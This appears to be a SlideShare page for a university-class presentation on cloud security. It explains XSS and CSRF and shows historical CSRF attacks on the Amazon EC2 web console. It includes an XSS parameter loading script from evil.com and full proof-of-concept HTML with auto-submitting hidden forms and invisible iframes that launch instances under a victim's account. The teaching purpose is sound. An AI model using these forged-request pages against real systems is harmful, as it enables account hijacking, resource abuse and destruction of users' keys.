Marco Arena
Outline
• Recalls (XSS and CSRF)
• Attacks against Amazon EC2 management
  console
• Amazon EC2 real vulnerabilities
  – W...
Outline
• Recalls (XSS and CSRF)
• Attacks against Amazon EC2 management
  console
• Amazon EC2 real vulnerabilities
  – W...
Recalls
• XSS (Cross-Site Scripting) vulnerability
  allows an attacker to use a website to
  transmit an attack (the webs...
Recalls
• XSS, a simple example:

  <c:if test=“${param.sayHello}”>   Server-Side JSP
     Hello ${param.name}!
  </c:if>
...
Recalls
• CSRF (Cross-Site Request Forgery) is an
  attack which forces an end user to
  execute unwanted actions on a web...
Recalls
• CSRF, a simple example:
                                ...
                                       <img
        ...
Outline
• Recalls (XSS and CSRF)
• Attacks against Amazon EC2 management
  console
• Amazon EC2 real vulnerabilities
  – W...
Attacks against EC2
• The Amazon EC2 cloud is managed via web
  services and web interface consoles.

• The web management...
Attacks against EC2
• Once an attacker gains access to the EC2
  user’s session, the Amazon web
  management console offer...
Attacks against EC2
• If the attacker discovers an XSS
  vulnerability anywhere on the
  Amazon.com domain, he can use a s...
Outline
• Recalls (XSS and CSRF)
• Attacks against Amazon EC2 management
  console
• Amazon EC2 real vulnerabilities
  – W...
Amazon EC2 real vulnerabilities
• The security of AMI instances depends on
  the web management console for
  security.

•...
Outline
• Recalls (XSS and CSRF)
• Attacks against Amazon EC2 management
  console
• Amazon EC2 real vulnerabilities
  – W...
Web management console vulnerabilities

• The first allows the attacker to start an
  arbitrary AMI instance using the vic...
Web management console vulnerabilities

initialize.html:

<html>
<body>
<img
  src="https://console.aws.amazon.com/ec2/_la...
Web management console vulnerabilities

initialize.html:
              Cross-Domain
<html>
             Image Tag
<body>
<...
Web management console vulnerabilities

launch.html:
<html>
<body>
<form action="https://console.aws.amazon.com/ec2/runIns...
Web management console vulnerabilities
Web management console vulnerabilities

Merge:

<html>
<body>
<iframe src="./initialize.html" height="0"
  width="0"></ifr...
Web management console vulnerabilities

Merge:            The browser will not
                  display the reply of
<htm...
Web management console vulnerabilities

• The second vulnerability terminates
  arbitrary AMIs being run by the victim.

•...
Web management console vulnerabilities

• The last vulnerability involves the
  deletion of AMI key pairs.

• Using a CSRF...
Outline
• Recalls (XSS and CSRF)
• Attacks against Amazon EC2 management
  console
• Amazon EC2 real vulnerabilities
  – W...
AWS portals vulnerabilities

• AWS was the first method Amazon provided to
  manage AMIs and is generally considered the
 ...
AWS portals vulnerabilities

• AWS was the first method Amazon provided to
  manage AMIs and is generally considered the
 ...
AWS portals vulnerabilities

• The first attack against AWS generates a new
  access key for the EC2 user’s session.

• Ac...
AWS portals vulnerabilities

• This next attack forcibly deletes any
  X.509 certificates previously generated
  by the EC...
Outline
• Recalls (XSS and CSRF)
• Attacks against Amazon EC2 management
  console
• Amazon EC2 real vulnerabilities
  – W...
Conclusions

• Cloud Computing allows organizations to
  focus on their core business while
  ensuring that their IT infra...
Conclusions

• Uploading the most hardened virtual
  machine will not prevent attacks against
  the web-based management c...
References

• Hacking: the Next Generation
 Nitesh Dhanjani, Billy Rios, and Brett Hardin. O’Reilly, 2009.


• Hacking Exp...
Upcoming SlideShare
Loading in...5
×

Cloud Insecurity

3,114

Published on

A short presentation for a university class.

Published in: Technology, Business
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
3,114
On Slideshare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
0
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Cloud Insecurity

  1. 1. Marco Arena
  2. 2. Outline • Recalls (XSS and CSRF) • Attacks against Amazon EC2 management console • Amazon EC2 real vulnerabilities – Web management console – Amazon Web Services (AWS) portals • Conclusions
  3. 3. Outline • Recalls (XSS and CSRF) • Attacks against Amazon EC2 management console • Amazon EC2 real vulnerabilities – Web management console – Amazon Web Services (AWS) portals • Conclusions
  4. 4. Recalls • XSS (Cross-Site Scripting) vulnerability allows an attacker to use a website to transmit an attack (the website becomes the vector through which attackers reach their victims). • XSS is today’s most widely reported software vulnerability.
  5. 5. Recalls • XSS, a simple example: <c:if test=“${param.sayHello}”> Server-Side JSP Hello ${param.name}! </c:if> Evil parameter: %3Cscript%20src%3D%22Dhttp%3A//evil.com/evil.js%22%3E%3C /script%3E Result: Hello <script src=“http://evil.com/evil.js”></script>
  6. 6. Recalls • CSRF (Cross-Site Request Forgery) is an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated. • CSRF tricks the victim into loading a page that contains a malicious request.
  7. 7. Recalls • CSRF, a simple example: ... <img src=“http://truste Trusted blog (i.e. MySpace) dblog.com/addfrien d.php?id=12345”/> ... Active session User Evil Site
  8. 8. Outline • Recalls (XSS and CSRF) • Attacks against Amazon EC2 management console • Amazon EC2 real vulnerabilities – Web management console – Amazon Web Services (AWS) portals • Conclusions
  9. 9. Attacks against EC2 • The Amazon EC2 cloud is managed via web services and web interface consoles. • The web management console asks the user to provide her Amazon.com username and password. • The login page is hosted on the Amazon.com domain, making it susceptible to web application vulnerabilities found anywhere on the domain.
  10. 10. Attacks against EC2 • Once an attacker gains access to the EC2 user’s session, the Amazon web management console offers a wealth of information related to the victim’s EC2 instances (X.509 certificates, secret tokens, ...).
  11. 11. Attacks against EC2 • If the attacker discovers an XSS vulnerability anywhere on the Amazon.com domain, he can use a simple JavaScript payload to steal the EC2 user’s Access Key ID and Secret Access Key.
  12. 12. Outline • Recalls (XSS and CSRF) • Attacks against Amazon EC2 management console • Amazon EC2 real vulnerabilities – Web management console – Amazon Web Services (AWS) portals • Conclusions
  13. 13. Amazon EC2 real vulnerabilities • The security of AMI instances depends on the web management console for security. • Several portions of Amazon’s web management console were vulnerable to cross-site request forgery (CSRF) attacks.
  14. 14. Outline • Recalls (XSS and CSRF) • Attacks against Amazon EC2 management console • Amazon EC2 real vulnerabilities – Web management console – Amazon Web Services (AWS) portals • Conclusions
  15. 15. Web management console vulnerabilities • The first allows the attacker to start an arbitrary AMI instance using the victim’s EC2 account. • Two parts: – Initialize an evil AMI; – Launch the instance under the victim’s EC2 account.
  16. 16. Web management console vulnerabilities initialize.html: <html> <body> <img src="https://console.aws.amazon.com/ec2/_launchWizar dForm.jsp? action.ImageId=ami-00031337&architecture=i386& image_icon=%2Fimages%2Flogo_windows.gif& image_title=Basic%20Microsoft%20Windows%20Server%202 003& selected_language=undefined&groupName=Webserver&keyN ame=undefined"> </body> </html>
  17. 17. Web management console vulnerabilities initialize.html: Cross-Domain <html> Image Tag <body> <img src="https://console.aws.amazon.com/ec2/_launchWizar dForm.jsp? action.ImageId=ami-00031337&architecture=i386& image_icon=%2Fimages%2Flogo_windows.gif& image_title=Basic%20Microsoft%20Windows%20Server%202 003& selected_language=undefined&groupName=Webserver&keyN ame=undefined"> </body> </html>
  18. 18. Web management console vulnerabilities launch.html: <html> <body> <form action="https://console.aws.amazon.com/ec2/runInstancesJson?" id="LaunchEvilAMI" name="LaunchEvilAMI" method="POST"> <input type="hidden" name="action.MinCount" value="1" /> <input type="hidden" name="action.InstanceType" value="m1.small" /> <input type="hidden" name="action.SecurityGroup" value="default" /> <input type="hidden" name="action.SecurityGroup" value="Webserver" /> <input type="hidden" name="action.MaxCount" value="1000000" /> <input type="hidden" name="action.ImageId" value="ami-00031337" /> <input type="hidden" name="mbtc" value="50084" /> <input type="hidden" name="region" value="us-east-1" /> </form> <script> setTimeout("document.LaunchEvilAMI.submit()",5000); </script> </body> </html>
  19. 19. Web management console vulnerabilities
  20. 20. Web management console vulnerabilities Merge: <html> <body> <iframe src="./initialize.html" height="0" width="0"></iframe> <iframe src="./launch.html" height="0" width="0"></iframe> </body> </html>
  21. 21. Web management console vulnerabilities Merge: The browser will not display the reply of <html> the web server. <body> <iframe src="./initialize.html" height="0" width="0"></iframe> <iframe src="./launch.html" height="0" width="0"></iframe> </body> </html>
  22. 22. Web management console vulnerabilities • The second vulnerability terminates arbitrary AMIs being run by the victim. • After the attack is launched, the victim can see that the instance was terminated without her consent.
  23. 23. Web management console vulnerabilities • The last vulnerability involves the deletion of AMI key pairs. • Using a CSRF vulnerability, an attacker has the ability to delete arbitrary key pairs from a victim’s EC2 session. If the key pair is deleted, and the user has not properly backed up the key pair, he will have lost access to his own AMIs!
  24. 24. Outline • Recalls (XSS and CSRF) • Attacks against Amazon EC2 management console • Amazon EC2 real vulnerabilities – Web management console – Amazon Web Services (AWS) portals • Conclusions
  25. 25. AWS portals vulnerabilities • AWS was the first method Amazon provided to manage AMIs and is generally considered the most secure option for AMI administration. • The three most common methods of authentication are : – a username/password combination; – an Access Key ID/Secret Access Key combination; – and X.509 certificates
  26. 26. AWS portals vulnerabilities • AWS was the first method Amazon provided to manage AMIs and is generally considered the most secure option for AMI administration. • The three most common methods of authentication are : – a username/password combination; – an Access Key ID/Secret Access Key combination; – and X.509 certificates.
  27. 27. AWS portals vulnerabilities • The first attack against AWS generates a new access key for the EC2 user’s session. • Access keys are used to authenticate a user to AWS, which is used to administer and manage the various AMIs running in a user’s account. • The attacker can create a temporary denial of service as the administrator must now update all the applications utilizing access key authentication to use the newly generated key.
  28. 28. AWS portals vulnerabilities • This next attack forcibly deletes any X.509 certificates previously generated by the EC2 user. • Once the X.509 certificates are deleted, any application that relied on X.509 certificate authentication must be redeployed with the newly generated certificates.
  29. 29. Outline • Recalls (XSS and CSRF) • Attacks against Amazon EC2 management console • Amazon EC2 real vulnerabilities – Web management console – Amazon Web Services (AWS) portals • Conclusions
  30. 30. Conclusions • Cloud Computing allows organizations to focus on their core business while ensuring that their IT infrastructures are flexible enough to meet the demands of current and future users. • But it does not magically protect application logic from abuse or prevent attacks against the application level.
  31. 31. Conclusions • Uploading the most hardened virtual machine will not prevent attacks against the web-based management consoles that are used to administer the virtual machines. • Cloud providers must fix their security bugs and perform an incessant code review.
  32. 32. References • Hacking: the Next Generation Nitesh Dhanjani, Billy Rios, and Brett Hardin. O’Reilly, 2009. • Hacking Exposed: Web 2.0 Rich Cannings, Himanshu Dwivedi, Zane Lackey. Mc-Graw Hill, 2008 • Secure Programming with Static Analysis Brian Chess, Jacob West. Addison-Wesley, 2007.

×